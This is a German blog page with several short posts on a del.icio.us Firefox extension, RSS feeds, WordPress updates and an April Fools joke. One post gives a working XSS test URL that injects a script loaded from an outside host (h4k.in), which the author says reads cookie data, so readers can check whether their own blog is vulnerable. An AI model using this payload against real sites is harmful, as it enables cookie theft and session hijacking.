Peruns Weblog - Webwork und Internet

Just wurde im del.icio.us-blog verkündet, dass die Entwicklung der neuen FF-Bookmark-Extension abgeschlossen ist. Das gereicht zur Freude, denn die neue Extension ist kick-ass-cool :). Erstens integriert sie sich komplett als Sidebar in FF Oberfläche und zweitens lassen sich die Bookmarks damit schnell bei del.icio.us durchsuchen und neue Seiten per Klick dort taggen und bookmarken. (» Weiterlesen…)

Weil mal wieder das Thema "Volle oder gekürzte Feeds" auf ein paar Seiten diskutiert wird (1, 2 und 3) wollte ich auch meine Meinung zu diesem Thema geben - allerdings als Leser.

Meiner Meinung nach gibt es diesbezüglich keine Diskussion, als Leser erwarte ich volle Feeds, denn nur bei vollen Feeds kann ich z.B. in Bloglines selbst entscheiden ob ich ein Feed komplett, in Form einer Zusammenfassung oder als Überschrift präsentiert bekomme bzw. lese. Wenn der Betreiber aber die Feeds kastriert, dann bleibt mir diese Entscheidung verwehrt. (» Weiterlesen…)

Christoph Hörl hat eine sehr gute und leicht verständliche Facharbeit über Google geschrieben. Diese gibt es es als ein 30-Seitiges PDF-Dokument (ca. 970 kb) oder man kann kapitelweise auf der dazugehörigen Website lesen. Herzlichen Glückwunsch meinerseits zu der gelungenen Arbeit und für die gute Note.

Die neuen Versionen von Wordpress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=
http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht - gut für Lesezeichenverwaltung und für die Suchmaschinen - der schaue sich bitte den Beitrag Optimaler Seitentitel in Wordpress und die Kommentare an.

Die Updates für die Versionstränge 2.0.x und 2.1.x sind erschienen und es werden ein paar Sicherheitslücken geschlossen und Fehler korrigiert. Die Versionen bekommt man im Archiv.

Da es sich hierbei um einen kleinen Versionssprung handelt, sollte es ausreichen wenn man das neue Paket über die alten Datein überspielt. Es kommen keine neuen Funktionen und an der Datenbank wurde nichts geändert.

Nachtrag: ich habe jetzt mehrere Weblogs von 2.0.9 auf 2.0.10 und von 2.1.2 auf 2.1.3 upgedatet und es reicht einfach aus, wenn man das Paket entpackt und hochlädt bzw. die alten Dateien überspielt.

Leute, es gibt sehr gute Nachrichten für mich und ich kann Sie einfach nicht mehr für mich behalten. In knapp zwei Wochen werde ich den neu geschaffenen Posten als Produktmanager bei Wordpress.de antreten.

Die Domain ist vor mehreren Monaten in die Hände von den Wordpress-Entwicklern übergegangen und nun will man in dem gesamten deutschsprachigen Raum weiter Fuß fassen und die Marktführung ausbauen. Daher wird bald die Wordpress.de GmbH gegründet und ich werde als Produktmanager somit die Nr. 2 in dem neuen Unternehmen. Bis sich das Unternehmen etabliert und wir eine klare Struktur finden, werde ich zusätzlich noch die Arbeit des Tech-Evangelisten für Wordpress-Deutschland übernehmen.

Nachtrag: wie es viele erraten haben, handelt es sich hierbei um einen April-Scherz. Und auch wenn das mittlerweile klar ist, bringe ich dennoch diesen Hinweis an, da viele Besucher über Suchmaschinen her gelangen und evtl. nicht direkt merken das es sich um einen Scherz handelt und ich einfach Missverständnisse vermeiden möchte.